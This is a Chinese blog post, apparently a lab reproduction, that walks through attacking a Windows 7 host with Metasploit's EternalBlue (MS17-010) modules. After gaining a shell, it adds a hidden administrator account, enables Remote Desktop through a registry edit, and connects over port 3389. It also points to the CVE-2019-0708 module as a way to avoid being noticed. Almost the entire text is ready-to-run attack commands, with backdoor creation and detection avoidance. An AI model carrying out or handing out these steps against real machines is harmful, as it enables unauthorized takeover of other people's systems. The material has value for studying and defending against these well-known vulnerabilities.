前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用ms17_010开启3389端口

利用ms17_010开启3389端口

作者头像
字节脉搏实验室
发布2020-03-08 17:12:14
3.3K0
发布2020-03-08 17:12:14
举报

攻击机kali

目标机win7 sp1(旗舰版)

当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块

use auxiliary/scanner/smb/smb_ms17_010 设置目标IP或网段 set RHOSTS 192.168.194.129执行扫描 run

这里可以看到可能存在,我们开始执行,得到shell,如果出现乱码的话执行chcp 65001

use exploit/windows/smb/ms17_010_eternalblue 查看可设置的选项 show options 设置***目标ip set RHOST 192.168.194.129 执行攻击exploit

然后我们创建用户名密码 blue/blue net user blue blue /add 将用户blue添加入管理组 (不加入会连接不上) net localgroup administrators blue /add 开启远程桌面功能 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题) Kali远程桌面连接Win7 rdesktop 192.168.194.129:3389(不在msf中执行)

这里连接会在目标机器上得到提示,如果不管的话30秒后将默认选择确定断开

当点击确定的话,可以连接成功

如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接),复现要将win7升级的激活码,上网上随便找就行

补充一下,如果这两个漏洞复现不成功,可能是防火墙的原因,或者重启一下(嘻嘻)

至此复现成功

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档